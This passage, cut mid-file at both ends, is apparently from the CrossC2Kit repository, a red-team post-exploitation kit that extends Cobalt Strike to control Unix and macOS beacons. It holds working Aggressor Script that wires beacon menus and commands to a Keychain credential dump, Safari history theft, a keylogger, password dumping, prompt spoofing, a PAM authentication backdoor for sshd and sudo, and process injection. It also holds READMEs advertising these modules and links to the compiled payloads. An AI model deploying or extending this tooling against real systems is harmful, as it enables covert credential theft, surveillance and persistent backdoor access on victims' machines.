221 | } 222 | item "Set Internal IP" { 223 | openModifyMetaData($1, "setlocalip", "10.0.0.1"); 224 | } 225 | item "Set HostName" { 226 | openModifyMetaData($1, "sethostname", "test_hostname"); 227 | } 228 | } 229 | separator(); 230 | local('$bid $f_status $f_ps_inject_status $f_shellcode_status'); 231 | foreach $bid ($1) { 232 | $f_status = cc2_frp_status($bid); 233 | if ($f_status) { 234 | item("Proxy(FRP) - ".$f_status, { openProxyDialog($1); }); 235 | } 236 | $f_ps_inject_status = cc2_inject_status($bid); 237 | if ($f_ps_inject_status) { 238 | item("ProcessInject - ".$f_ps_inject_status, { 239 | openInjectDialog($1); 240 | }); 241 | } 242 | } 243 | menu "&Gather" { 244 | local('$bid $safari_d_status $keychain_d_status $keylogger_status $imessage_d_status $mimipenguin_status $auth_pam_status $auth_ssh_status'); 245 | foreach $bid ($1) { 246 | $safari_d_status = cc2_safari_dump_status($bid); 247 | if ($safari_d_status) { 248 | item "Safari Dump" { 249 | openSafariDialog($bid); 250 | } 251 | } 252 | $keychain_d_status = cc2_keychain_dump_status($bid); 253 | if ($keychain_d_status) { 254 | item "Keychain Dump" { 255 | 256 | } 257 | } 258 | $keylogger_status = cc2_keylogger_status($bid); 259 | if ($keylogger_status) { 260 | item("Keylogger - ".$keylogger_status, { 261 | openKeyloggerDialog($bid); 262 | }); 263 | } 264 | $imessage_d_status = cc2_iMessage_dump_status($bid); 265 | if ($imessage_d_status) { 266 | item "iMessage Dump" { 267 | openIMessageDumpDialog($bid); 268 | } 269 | } 270 | $mimipenguin_status = cc2_mimipenguin_status($bid); 271 | if ($mimipenguin_status) { 272 | item("Dump Password - ".$mimipenguin_status, { 273 | openMimipenguinDialog($bid); 274 | }); 275 | } 276 | $prompt_spoof_status = cc2_prompt_spoof_status($bid); 277 | if ($prompt_spoof_status) { 278 | item("PromptSpoof - ".$prompt_spoof_status, { 279 | openPromptSpoofDialog($bid); 280 | }); 281 | } 282 | $auth_pam_status = cc2_auth_status($bid); 283 | if ($auth_pam_status) { 284 | menu "PAM" { 285 | item("PAM(sshd/sudo/su/passwd) - ".cc2_auth_status($bid),{ 286 | openAuthKitDialog($bid); 287 | }); 288 | item "uninstall" { 289 | openAuthKitUninstallDialog($bid); 290 | } 291 | } 292 | } 293 | $auth_ssh_status = cc2_ssh_status($bid); 294 | if ($auth_ssh_status) { 295 | menu "ssh_client" { 296 | item("ssh - ".cc2_ssh_status($bid),{ 297 | binput($bid, "help cc2_ssh"); 298 | }); 299 | } 300 | } 301 | } 302 | } 303 | } 304 | } 305 | 306 | ssh_alias spawn { 307 | bcc2_spawn($1); 308 | } 309 | 310 | ssh_alias getsystem { 311 | bcc2_getsystem($1); 312 | } 313 | 314 | ssh_alias setenv { 315 | bcc2_setenv($1, $2, $3); 316 | } 317 | 318 | ssh_alias unsetenv { 319 | bcc2_unsetenv($1, $2); 320 | } 321 | 322 | ssh_command_register("spawn", "Spawn a new session"); 323 | ssh_command_register("getsystem", "Promote the session with uid=0 temporary permission to root session"); 324 | ssh_command_register("setenv", "Set the environment variables of the session", "\nUsage: setenv \n\tsetenv PATH ./:/usr/bin/\n"); 325 | 326 | 327 | set SSH_SBAR_LEFT { 328 | local('$computer $user $pid $barch'); 329 | ($computer, $user, $barch) = values($2, @('computer', 'user', 'barch')); 330 | $usi = indexOf($user, " "); 331 | if ($usi ne $null) { 332 | $user = substr($user, 0, $usi); 333 | } 334 | $si = indexOf($computer, "("); 335 | $si = $si + 1; 336 | $ei = indexOf($computer, ")"); 337 | $pid = substr($computer, $si, $ei); 338 | return "[ $+ $user\@$computer $+ ][ $+ $barch $+ ] PID=$pid"; 339 | } 340 | 341 | # beaconid, %meta 342 | set SSH_SBAR_RIGHT { 343 | if ($2['note'] ne "") { 344 | return "\c2" . $2['note'] . " \olast: " . $2['lastf'] . " "; 345 | } 346 | else { 347 | return "last: " . $2['lastf'] . " "; 348 | } 349 | } 350 | 351 | 352 | 353 | # Useful aliases, placed in kitloader because I always have this loaded 354 | # from 'Und3rf10w - KitLoader.cna' 355 | 356 | ssh_alias cat { 357 | if ($2){ 358 | bshell($1, "cat $2"); 359 | } else { 360 | berror($1, "Error: You must specify a file"); 361 | } 362 | } 363 | ssh_command_register("cat", "Displays the contents of a file", "Use: cat [file]\n\nDisplays the contents of [file]"); 364 | 365 | ssh_alias tail { 366 | if ($2){ 367 | bshell($1, "tail $2"); 368 | } else { 369 | berror($1, "Error: You must specify a file"); 370 | } 371 | } 372 | ssh_command_register("tail", "Print the last 10 lines of a file", "Use: tail [file]\n\nDisplays last 10 lines of [file]"); 373 | 374 | ssh_alias head { 375 | if ($2){ 376 | bshell($1, "head $2"); 377 | } else { 378 | berror($1, "Error: You must specify a file"); 379 | } 380 | } 381 | ssh_command_register("head", "Print the first 10 lines of a file", "Use: head [file]\n\nDisplays first 10 lines of [file]"); 382 | 383 | 384 | # $script_path = script_resource("third-party"); 385 | # @scripts_dir = ls($script_path); 386 | println("\n\n------------- load third-party ----------------"); 387 | 388 | sub include_file { 389 | local('$s_file'); 390 | $s_file = $1; 391 | if ("load.cna" isin $s_file) { 392 | include($s_file); 393 | } 394 | } 395 | 396 | sub parse_dir { 397 | local('$dir $script_path @scripts_dir'); 398 | $dir = $1; 399 | if (-isDir $dir) { 400 | @scripts_dir = ls($dir); 401 | 402 | local('$s_dir'); 403 | foreach $s_dir(@scripts_dir) { 404 | if (-isDir $s_dir) { 405 | # println("[dir]: $s_dir"); 406 | parse_dir($s_dir); 407 | } else { 408 | # println("[file]: $s_dir"); 409 | include_file($s_dir); 410 | } 411 | } 412 | } else { 413 | # println("[file]: $dir"); 414 | include_file($dir); 415 | } 416 | } 417 | 418 | parse_dir(script_resource("third-party")); -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CrossC2 Kit 2 | 3 | [README](README.md) | [中文文档](README_zh.md) 4 | 5 | CrossC2Kit is an infiltration expansion around the Unix platform derived from CrossC2. Use **Aggressor Script** Open Source Script engine. It can be used to create automation to simulate the operation process of the Red Team and expand the **CobaltStrike** client. 6 | 7 | **CrossC2Kit** is inherited from the original features of **CobaltStrike**, so the development and writing grammar still refer to the official documentation: https://trial.cobaltstrike.com/aggressor-script/index.html 8 | 9 | 10 | ![](media/16295280892271/16295284817531.jpg) 11 | 12 | However, it has also performed some API expansion on CrossC2 to control the UNIX platform Beacon. The main functions are to perform the dynamic library (`.so` / `.dylib`) and executable files (`ELF` / `MachO`) and executable files from memory parsing. Script (`bash` / `python` / `php` ...). At the same time, some data set interfaces of CobaltStrike are reserved, such as 13 | `portscan`, `screenshots`, `keylogger`, `credentials`, etc., can quickly develop **Portscan** and other kits. And if you are familiar with the CS native protocol, you can specify some more complicated data results for more flexible metadata collection. 14 | ![](media/15854585486601/15854593957704.jpg) 15 | 16 | ## basic function 17 | 18 | **`Interpreter related plug-ins`**、**`Password dump module`**、**`Authentication backdoor modules`**、**`Information collection modules`**、**`Traffic proxy module`**、**`Keylogger module`**、**`Privilege promotion module`**、**`Task management module`** 19 | 20 | See wiki for details: [About CrossC2Kit](https://github.com/CrossC2/CrossC2Kit/wiki/About-CrossC2-Kit) 21 | 22 | ## API Reference: 23 | 24 | Memory loading related API: [API wiki](https://gloxec.github.io/CrossC2/zh_cn/api) 25 | 26 | API function manual:[API Reference](https://github.com/CrossC2/CrossC2Kit/wiki/API-Reference) 27 | 28 | API demo:[/third-party/api_demo/load.cna](https://github.com/CrossC2/CrossC2Kit/blob/e5bcf1a60a829c80bf7cc139841c6ccac968a43b/third-party/api_demo/load.cna) 29 | 30 | ## Custom expansion 31 | 32 | Use **CrossC2Kit** to develop customized expansion: 33 | Put the custom extension according to the classification, compilation source code, configuration file, etc. into the `third-party` Folder, the client will automatically load the extended `load.cna` 34 | 35 | https://github.com/CrossC2/CrossC2Kit/blob/b108739d60abaafca66183fd1584bde6a8aa4aed/third-party/readme.md?plain=1#L11-L21 36 | 37 | For details: https://github.com/CrossC2/CrossC2Kit/tree/template/third-party 38 | 39 | 40 | ## Pull Request 41 | 42 | 1. git clone https://github.com/CrossC2/CrossC2Kit.git 43 | 2. cd CrossC2Kit && mkdir third-party 44 | 3. Place the extended plug-in in the **third-party** directory and perform **Pull Request** 45 | 4. **Pull Request** will merge after automatic compilation 46 | 47 | 48 | 49 | 50 | ```c 51 | ├── third-party 52 | │   ├── test.cna 53 | │   └── util 54 | │ ├── lpe // Type of plugin 55 | │ │ ├── cve-2021-1102 // The name of the plugin 56 | │ │ │ ├── load.cna // Loading file of the plug-in * 57 | │ │ │ ├── readme.md // Description document of plug-in 58 | │ │ │ ├── src // The source code directory of binary components in the plugin 59 | │ │ │ │ ├── exp.c // Source code to be compiled * 60 | │ │ │ │ └── makefile // Automatic compiled configuration file * 61 | │ │ │ └── testa.cna // CNA script used inside the plug-in 62 | │ │ └── cve-2022-2202 63 | │   │   ├── load.cna 64 | │   │   ├── readme.md 65 | │   │   └── src 66 | │   │   ├── exp.c 67 | │   │   └── makefile 68 | │   └── pass 69 | │   ├── linux-login 70 | │   │   ├── load.cna 71 | │   │   └── src 72 | │   │   ├── exp.c 73 | │   │   └── makefile 74 | │   └── readme.md 75 | ``` 76 | 77 | 5. The compilation results will be displayed in **Summary**, including 78 | 79 | `System architecture information` 80 | 81 | `Compile process` 82 | 83 | `Compilation results symbol information` 84 | 85 | `GLIBC version information contained in Linux programs` 86 | 87 | `The overall result of compilation` 88 | 89 | ![](media/16295280892271/16547563992094.jpg) 90 | 91 | ![](media/16295280892271/16547565084907.jpg) 92 | 93 | 94 | -------------------------------------------------------------------------------- /README_zh.md: -------------------------------------------------------------------------------- 1 | # CrossC2 Kit 2 | 3 | [README](README.md) | [中文文档](README_zh.md) 4 | 5 | CrossC2Kit 是围绕着CrossC2 衍生出的Unix平台后渗透扩展,采用 **Aggressor Script** 开源脚本引擎。可以用来创建自动化来模拟红队操作过程,以及扩展CobaltStrike客户端。 6 | 7 | CrossC2Kit 整体继承于CobaltStrike原有的功能,所以开发与编写语法仍然参照官方文档: https://trial.cobaltstrike.com/aggressor-script/index.html 8 | 9 | 10 | ![](media/16295280892271/16295284817531.jpg) 11 | 12 | 但它在 CrossC2 之上又进行了一些API拓展,用于控制 Unix 平台beacon,主要功能为从内存解析执行用户下发的 动态库 ( .so / .dylib ) 与 可执行文件 ( ELF / MachO ) 以及 脚本 ( bash / python / php ... )。同时预留了CobaltStrike的一些数据集接口,例如 13 | `端口扫描`, `屏幕截图`, `键盘记录`, `密码凭证` 等等,可以快捷开发portscan等等套件。以及如果熟悉CS原生协议的话,可以指定更加复杂的一些数据结果等进行更灵活的元数据收集。 14 | ![](media/15854585486601/15854593957704.jpg) 15 | 16 | ## 基础功能: 17 | 18 | 内存解释器、内存执行、密码dump、认证后门、信息收集(浏览器、keychain),流量代理,键盘记录模块,网络探测模块,权限提升,任务管理等。 19 | 20 | 详情见wiki: [About CrossC2Kit](https://github.com/CrossC2/CrossC2Kit/wiki/About-CrossC2-Kit) 21 | 22 | ## API 文档: 23 | 24 | 内存加载相关API: [API wiki](https://gloxec.github.io/CrossC2/zh_cn/api) 25 | 26 | API函数手册:[API Reference](https://github.com/CrossC2/CrossC2Kit/wiki/API-Reference) 27 | 28 | API demo链接:[/third-party/api_demo/load.cna](https://github.com/CrossC2/CrossC2Kit/blob/e5bcf1a60a829c80bf7cc139841c6ccac968a43b/third-party/api_demo/load.cna) 29 | 30 | ## 自定义拓展: 31 | 32 | 使用 **CrossC2Kit** 开发自定义的扩展: 33 | 将自定义的扩展按照分类、编译源码,配置文件等放入`third-party`文件夹中,客户端将会自动加载扩展的`load.cna` 34 | 35 | https://github.com/CrossC2/CrossC2Kit/blob/b108739d60abaafca66183fd1584bde6a8aa4aed/third-party/readme.md?plain=1#L11-L21 36 | 37 | 详见例子: https://github.com/CrossC2/CrossC2Kit/tree/template/third-party 38 | 39 | 40 | ## 插件提交方式 41 | 42 | 1. git clone https://github.com/CrossC2/CrossC2Kit.git 43 | 2. cd CrossC2Kit && mkdir third-party 44 | 3. 将扩展插件置入该目录后进行 pull request 45 | 4. pull request 项目将在自动编译通过后进行合并 46 | 47 | 48 | ```c 49 | ├── third-party 50 | │   ├── test.cna 51 | │   └── util 52 | │ ├── lpe // 插件分类 53 | │ │ ├── cve-2021-1102 // 插件名称 54 | │ │ │ ├── load.cna // 插件启动入口 * 55 | │ │ │ ├── readme.md // 插件文档 56 | │ │ │ ├── src // 插件包含的二进制组件源码目录 57 | │ │ │ │ ├── exp.c // 待编译的源码 * 58 | │ │ │ │ └── makefile // 自动编译的工程配置文件 * 59 | │ │ │ └── testa.cna // 插件内部用到的cna脚本 60 | │ │ └── cve-2022-2202 61 | │   │   ├── load.cna 62 | │   │   ├── readme.md 63 | │   │   └── src 64 | │   │   ├── exp.c 65 | │   │   └── makefile 66 | │   └── pass 67 | │   ├── linux-login 68 | │   │   ├── load.cna 69 | │   │   └── src 70 | │   │   ├── exp.c 71 | │   │   └── makefile 72 | │   └── readme.md 73 | ``` 74 | 75 | 5. 编译结果将在 **summary** 中显示,包含 76 | 77 | `系统架构信息` 78 | 79 | `编译过程` 80 | 81 | `编译结果符号信息` 82 | 83 | `Linux包含GLIBC版本信息` 84 | 85 | `编译整体结果` 86 | 87 | ![](media/16295280892271/16547563992094.jpg) 88 | 89 | ![](media/16295280892271/16547565084907.jpg) 90 | 91 | 92 | -------------------------------------------------------------------------------- /compile.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd /tmp/third-party 4 | for module in `find ./ | grep "makefile" | awk -F'/makefile' '{print $1}'` 5 | do 6 | cd /tmp/third-party 7 | cd $module 8 | make 9 | make clean 10 | done -------------------------------------------------------------------------------- /gather/browser/cc2_chrome_dump.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/browser/cc2_chrome_dump.dylib -------------------------------------------------------------------------------- /gather/browser/cc2_safari_dump.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/browser/cc2_safari_dump.dylib -------------------------------------------------------------------------------- /gather/browser/safari_dump.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_safari_dump { 5 | blog($1, "\nUsage: cc2_safari_dump \n\tdump browser history from Safari.\nEx:\n\tcc2_safari_dump test 100"); 6 | } 7 | 8 | sub cc2_safari_dump { 9 | $taskName = "cc2_safari_dump"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $username = $2; 15 | $queryCount = $3; 16 | $transportArg = $username."^".$queryCount; 17 | 18 | if ($username && $queryCount) { 19 | $loadlib = "gather/browser/cc2_safari_dump.dylib"; 20 | blog($beaconid, "cc2_safari_dump: "); 21 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 22 | } else { 23 | printUsage_safari_dump($beaconid); 24 | } 25 | 26 | } 27 | 28 | ssh_alias("cc2_safari_dump", &cc2_safari_dump); 29 | 30 | ssh_command_register("cc2_safari_dump", "CrossC2 safari dump - dump browser history from Safari(default 500).", "\nUsage: cc2_safari_dump \n\tdump browser history from Safari.\nEx:\n\tcc2_safari_dump test 100"); 31 | 32 | 33 | sub openSafariDialogCallBack { 34 | $bid = $3['bid']; 35 | $username = $3['d_username']; 36 | $queryCount = $3['d_count']; 37 | binput($bid, "cc2_safari_dump $username $queryCount"); 38 | cc2_safari_dump($bid, $username, $queryCount); 39 | } 40 | 41 | sub openSafariDialog { 42 | local('$bid $dialog'); 43 | $bid = $1; 44 | $dialog = dialog("Safari Dump", %(bid => $bid[0], d_username => "test", d_count => "100"), &openSafariDialogCallBack); 45 | dialog_description($dialog, "dump browser history from Safari"); 46 | 47 | drow_text($dialog, "d_username", "username: ", 20); 48 | drow_text($dialog, "d_count", "history count: ", 20); 49 | 50 | dbutton_action($dialog, "run"); 51 | dialog_show($dialog); 52 | } 53 | 54 | 55 | sub cc2_safari_dump_status { 56 | local('$bid $os $arch $system'); 57 | $bid = $1; 58 | $os = lc(beacon_info($bid, "os")); 59 | $arch = beacon_info($bid, "arch"); 60 | if ('macos' isin $os) { 61 | return 'MacOS(intel)'; 62 | } 63 | return ''; 64 | } -------------------------------------------------------------------------------- /gather/keychain/cc2_keychain_dump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/keychain/cc2_keychain_dump -------------------------------------------------------------------------------- /gather/keychain/cc2_keychain_list.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/keychain/cc2_keychain_list.dylib -------------------------------------------------------------------------------- /gather/keychain/keychain_dump.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_keychain_dump { 5 | blog($1, "\nUsage: cc2_keychain_dump /\n\tneed root permissions.\n\tdump login username & password from Keychain.\nEx:\n\tcc2_keychain_dump list\n\tcc2_keychain_dump /User/target/Library/Keychains/login.keychain {default}"); 6 | } 7 | 8 | sub cc2_keychain_dump { 9 | $taskName = "cc2_keychain_dump"; # taskName 10 | $taskType = "MachO"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $keychain = $2; 15 | $transportArg = $keychain."^".$3; 16 | 17 | if ($keychain) { 18 | if ($keychain eq "list") { 19 | $loadlib = "gather/keychain/cc2_keychain_list.dylib"; 20 | blog($beaconid, "cc2_keychain_dump: list"); 21 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 22 | } else { 23 | $loadlib = "gather/keychain/cc2_keychain_dump"; 24 | blog($beaconid, "cc2_keychain_dump: "); 25 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 26 | } 27 | } else { 28 | printUsage_keychain_dump($beaconid); 29 | } 30 | 31 | } 32 | 33 | ssh_alias("cc2_keychain_dump", &cc2_keychain_dump); 34 | 35 | ssh_command_register("cc2_keychain_dump", "CrossC2 Keychain dump (root) - dump login username & password from Keychain.", "\nUsage: cc2_keychain_dump /\n\tneed root permissions.\n\tdump login username & password from Keychain.\nEx:\n\tcc2_keychain_dump list\n\tcc2_keychain_dump /User/target/Library/Keychains/login.keychain {default}"); 36 | 37 | 38 | 39 | sub openKeychainDumpDialogCallBack { 40 | } 41 | 42 | sub openKeychainDumpDialog { 43 | } 44 | 45 | 46 | sub cc2_keychain_dump_status { 47 | local('$bid $os $arch $system'); 48 | $bid = $1; 49 | $os = lc(beacon_info($bid, "os")); 50 | $arch = beacon_info($bid, "arch"); 51 | if ('macos' isin $os) { 52 | return 'MacOS(intel)'; 53 | } 54 | return ''; 55 | } -------------------------------------------------------------------------------- /gather/keylogger/osx/cc2_keylogger.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/keylogger/osx/cc2_keylogger.dylib -------------------------------------------------------------------------------- /gather/keylogger/osx/keylogger_osx2.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_keylogger { 5 | blog($1, "\nUsage: cc2_keylogger \n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger osx test"); 6 | } 7 | 8 | sub cc2_keylogger { 9 | $taskName = "cc2_keylogger_osx"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "keystrokes"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $displayName = $2; 15 | $transportArg = $displayName."^"; 16 | 17 | $os = lc(beacon_info($bid, "os")); 18 | $arch = beacon_info($bid, "arch"); 19 | 20 | if ('macos' isin $os) { 21 | $loadlib = "gather/keylogger/osx/cc2_keylogger.dylib"; 22 | } else { 23 | berror($beaconid, "*[error]: Only supports osx."); 24 | printUsage_keylogger($beaconid); 25 | return; 26 | } 27 | if ($displayName) { 28 | blog($beaconid, "cc2_keylogger: "); 29 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 30 | } else { 31 | printUsage_keylogger($beaconid); 32 | } 33 | 34 | } 35 | 36 | ssh_alias("cc2_keylogger", &cc2_keylogger); 37 | 38 | ssh_command_register("cc2_keylogger", "CrossC2 keylogger - listen to the string entered by the user from the keyboard.", "\nUsage: cc2_keylogger \n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger test"); 39 | 40 | sub openKeyloggerDialogCallBack { 41 | $bid = $3['bid']; 42 | $processName = $3['processName']; 43 | binput($bid, "cc2_keylogger $processName"); 44 | cc2_keylogger($bid, $processName); 45 | } 46 | 47 | sub openKeyloggerDialog { 48 | local('$bid $dialog'); 49 | $bid = $1; 50 | $dialog = dialog("CrossC2 keylogger (MacOS)", %(bid => $bid[0], processName => "test"), &openKeyloggerDialogCallBack); 51 | dialog_description($dialog, "listen to the string entered by the user from the keyboard"); 52 | 53 | drow_text($dialog, "processName", "ProcessDisplay: ", 20); 54 | 55 | dbutton_action($dialog, "run"); 56 | dialog_show($dialog); 57 | } 58 | 59 | 60 | 61 | sub cc2_keylogger_status { 62 | local('$bid $os $arch $system'); 63 | $bid = $1; 64 | $os = 